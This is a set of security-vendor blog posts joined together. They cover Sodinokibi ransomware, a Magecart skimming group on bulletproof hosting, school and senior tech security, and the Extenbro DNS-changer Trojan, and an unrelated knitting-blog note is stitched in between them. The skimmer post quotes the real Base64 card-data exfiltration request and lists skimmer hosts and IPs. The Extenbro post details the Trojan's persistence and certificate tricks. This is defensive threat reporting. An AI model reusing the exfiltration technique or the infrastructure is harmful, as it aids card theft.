Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid June and mid July. Based on our telemetry, Sodinokibi has been on rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—”affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi has been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8 Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

• Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
• Malicious spam or phishing campaigns with links or attachments
• Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
• Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en-masse. This is done by accessing networks via a remote desktop protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

• .jpg
• .jpeg
• .raw
• .tif
• .png
• .bmp
• .3dm
• .max
• .accdb
• .db
• .mdb
• .dwg
• .dxf
• .cpp
• .cs
• .h
• .php
• .asp
• .rb
• .java
• .aaf
• .aep
• .aepx
• .plb
• .prel
• .aet
• .ppj
• .gif
• .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in their attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevated privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruitArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

• Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
• Run updates on all your systems and software, patching for any vulnerabilities.
• Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend IT administrators to do the following:

• Deny public IPs access to RDP port 3389.
• Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
• Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
• Apply the latest Microsoft update packages.
• In this vein, make sure all software on endpoints is up-to-date.
• Limit the use of system administration tools to IT personnel or employees who need access only.
• Disable macro on Microsoft Office products.
• Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
• Apply attachment filtering to email messages.
• Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.

Indicators of compromise (IOCs)

File hashes:

• e713658b666ff04c9863ebecb458f174
• bf9359046c4f5c24de0a9de28bbabd14
• 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider. It’s quite likely the threat actors may be taking advantage of it.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)
2cf2d3608a3e5dc2e0629bc80b5c3f11007608a1e6a3159931bb403f2a2ae09b
687a0deb72c250a24245e68101f2bd1acc377fc90ac22140f5cca9f515fc3914
7a20d0a5d8397624623e0a27d93c8741c187249d78e8f6d9dcad45010293d300
d5cbb9011352525a607c430c338a68a0a39d172940f03bb81b3bdaba91cb0e66
757df530dffe4b303399421ea0c53eb1723ba413585ef4ede804aaffed5cc3c1
f4fad9c9018befdaa455b6c248dd7fc017ed32f69123b6a1d04b4a2e44d69b25
37aac00b65d009fb8899f129a82ee3480640f50253ee0ff934ad25b9089254f2
c399a312c842494f81438d4510f8a7e6721912eb319a57e3d1ab34937f9dc29f
209bc0b8274cac2ed00c1fab4546cb6ab11f118497c71698b0317dc12ac68afa
12ac099a2169734b395a2519bcb783696ec46c10a6cde0ee1ad3262876336cf6
aa64fa4ba75c8c30b7eb57a24cbdf5b1dbb08d728717c89018305294237ac717
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
4e14ffc2ec79cb256605f7c2682d56fceec9638cd3545175088ad15977403dcc
ac5b6f62a62f4453c4b5c577b321fdca73d0e651c209aeb5b88a0c4a7f10b139
c139e980d2f5f21020b85db716c8a0d363ae3c30f54a7d5c290b320309283b59
27ab9adb71d7b49f8dcc1e2c168af06e4f71e4c43e7245663fcee191a70f7a7e
eb3adb1e1ae14300110439e490a39ed54ca51ba820944bd27f481b57eb0ab1aa
684fe4d87aa412c46b96dfa2c650bda2a0e9ef07bcaf294683387661107a5c72
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
2c00997d6b0e9ae06d9ed2fcae6effe9348dc660b3fea1a4e5c011f1eb2b9ace
66312a50ce08e29c01e9dfeae631f839c95f2c04d8f206e12c04abdd0a5df645
af02b45c1d1198271da309b5eedde13c4e8a24934407f7a49f10707dfdd796b7
74ac75cd8f1e35da0d047ed6dd995262563b614b8dfcdfa44f689ca920b51a63
aa7372fbe02932d1182572e7cc6ba69243be3222eb212418d0b6ea638dea5fbc
341e88b473dae607b698737b6032c5a0ba3ed1a0ba08bba15757c68126a00e29
645032eaa3dd159ef027b916950c3e1ab475bedcaaac0f9c61b594d74d6833be
d74f5d6f91fbc37583e69cbc919fbe41caa84bc77713dc644bcda5b5b8581553
d8ed7abe7bdb821b93ce24e5ee0e5b867370b3fd6fc5c92f1f2d7d34fa040260

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

• Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
• Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
• If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
• Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open— especially if there is a wealth of personally identifiable Information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that according to a 2016 study entitled: The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So when can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity Countermeasures

Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

• Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
• DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays, that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has been increased significantly, now that attackers have started using Memcached-enabled servers. To put a stop to outrageously-large DDoS attacks, those servers should not be Internet-facing.
• Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can absorb cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
• Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
• Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
• Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investments is worth it.

In fact, all of these measures will cost money and we realize that will need to come out of a tight budget. But funding, or the lack thereof, can not be an excuse for weak security. Cybercrime is one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!

The post Compromising vital infrastructure: problems in education security continue appeared first on Malwarebytes Labs.

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. However, often times it’s older generations that have to turn to their progenitors for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly-evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of having to keep up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?'”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting, “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers, and younger helpers, need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Happy Monday! Sorry there will be no post this weekend. I am neck deep in a couple sample knits that are on a very tight deadline. So many fun things are going on and I can't wait to share them with you this Sunday! xo Andi Andi

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.

DNS-changer

First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

New for this one is that you have to access the Advanced DNS tab to find out that it has added four DNS servers rather than the usual two. Where people might be inclined to change the two that are visible, use the Advanced button and look at the DNS tab: It would cause them to leave the additional two behind.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPV6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting the value to “FF”, the Trojan disables IPV6 to force the system to use the new DNS servers.

User.js

The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which Configures Firefox to use the Windows Certificate Store where the newly-added root certificate was added.

Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update you existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many Operating Systems on their site.

An extra step needs to be taken when you are in this screen:

Make sure to click on Advanced…and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

• To get to your security sites, you may need a restart of the browser. Do NOT reboot your system or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download  Malwarebytes to your desktop.
• Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
• Then click Finish.
• Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
• If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
• When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
• Restart your computer when prompted to do so.
• This procedure should take care of the Scheduled Task and the Root certificate.
• If you want to undo the change that makes FireFox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default settings is false. You can change the setting by selecting the line and right clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.

IOCs

DNS servers:

45.86.180.227

185.162.93.213

116.203.6.218

185.130.104.222

Installer:

SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:

36509B8F624CE280E0C797F42F4A8F552A280313

Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news

• The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
• Who watches the Watchmen: British police officer misuses database. (Source: The Register)
• Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
• Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
• Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
• TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
• Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
• Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
• Beware of whales: Ship operators are warned by the US coast guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
• Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.